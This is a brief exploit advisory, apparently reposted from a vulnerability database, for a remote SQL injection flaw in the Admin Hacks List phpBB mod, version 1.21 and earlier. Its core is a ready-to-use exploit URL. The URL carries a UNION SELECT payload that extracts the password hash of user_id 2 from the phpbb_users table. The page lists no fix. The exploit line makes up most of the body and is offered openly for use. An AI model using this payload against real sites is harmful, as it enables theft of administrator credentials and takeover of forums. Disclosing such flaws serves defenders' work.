Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability

2006-11-26 00:00:00

########################################################################
# Admin Hacks List v1.20 Remote SQL Injection Vulnerability
#
# Download: http://www.nivisec.com
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
#
# Greetz: str0ke , Dr Max Virus
########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.